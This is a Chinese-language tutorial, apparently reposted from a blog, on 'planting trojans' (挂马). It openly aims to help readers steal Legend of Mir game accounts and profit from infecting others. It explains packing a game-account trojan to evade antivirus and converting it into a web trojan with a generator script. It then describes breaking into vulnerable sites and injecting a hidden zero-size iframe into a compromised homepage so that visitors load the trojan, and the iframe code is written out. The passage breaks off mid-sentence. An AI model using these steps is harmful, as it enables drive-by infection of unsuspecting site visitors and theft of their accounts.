Your Ad Here
首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 网络安全 > 安全知识 > 活学活用--------------------挂马步步行
【标  题】:活学活用--------------------挂马步步行
【关键字】:--------------------
【来  源】:http://blog.chinaunix.net/article.php?articleId=45111&blogId=8709

活学活用--------------------挂马步步行

Your Ad Here

在网上有不少的网友想要盗些传奇号,或者通过给别人挂木马赚点钱,但是却又无从下手,下面,让我来介绍介绍怎么让自己的技术不荒废,而且还能通过黑站得到一点的报酬.

活学活用--------------------挂马步步行

                                               /  灵鸠剑客

先在网上找一个好一点的传奇木马,然后将生成的木马转换成htm格式,具体步骤如下:首先准备好,网页木马转换工具,和生成好的传奇木马,和一个加壳工具,当然,如果你确信你的木马是免查杀的,可以不用加壳和修改标识符。然后给木马加壳(如图一,二)

(图一:选择将要加壳的程序和输出的名称)

(图二:加壳完毕)

然后接下来就将传奇木马转换成网页木马,将加过壳后的喘气木马放入与“冰狐浪子网页木马生成器.js”同一目录下然后改名为”#.exe”(注意:没有双引号),然后双击“冰狐浪子网页木马生成器.js”,接下来会在同一文件夹里面生成两个文件,一个是“icyfox.htm”一个是“icefox.js”,只要把两个放在同一目录就可以运行这个js脚本了。然后在网上随便的逛一逛,查查有没有什么有点意思的站点,然后找到一些有漏洞可以利用的站点,比如:论坛里面的htm功能没有被关闭,跨站漏洞,sql注入漏洞,等等,因为这类漏洞比较多,当得到了一个站的webshell的时候,大家想到的当然是提升权限,但提升权限的文章和方法也有很多了,而提升权限之后又怎么办呢?下面我就主要介绍一下当得到后台权限之后该如何去挂自己的传奇木马上去,当得到了服务器管理员权限之后,接下来就是在上面挂马了,先将文件夹里的“icyfox.htm”的文件名改成别的,比如“ljjk.htm”等等,如果想改“icyfox.js”,就要将“icyfox.htm”里面的代码稍做改动,然后就可以上传到自己的空间里了,一定要放在同一目录,如果没有自己的空间的朋友,上传到服务器上面当然也是可以的,(如图三)

(图三:上传网页木马)

上传成功后,只要改一改特的首页的源代码就可以,在里面加入如下代码:

<iframe src=”你刚才传上去的icyfox.htm的路径” width=”0” height = ”0” frameborder = ”no” border = ”0” marginwidth = ”0” marginheight =”0” scrolling =”no”>

或者设成当关闭该页时运行这个脚本也可以,这样,我们的木马就挂
nc(瑞士军刀)的详细使用:【上一篇】
如何防止被挂马攻击:【下一篇】
【相关文章】
  • MPI并行程序开发设计----------------------------------并行编程模型和算法等介绍
  • 【随机文章】
  • 在vs.net 2003中编译ns2(5):编译ns2
  • 自控高手海尔
  • 在线编辑器FCKeditor
  • 另一种思考
  • linux实现最简单的虚拟文件系统代码--VFS
  • 接口处理篇(Linux c)
  • CH编程环境ChSciTe的配置for windows[原创]
  • 从 ASCII 到 UTF-8 : 大话编码
  • 如何移除数码照片的紫边
  • 利用 ASP.NET、JavaScript 和 OLE DB 从头设计您自己的网络日记应用程序
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 软讯网络 All Rigths Reserved.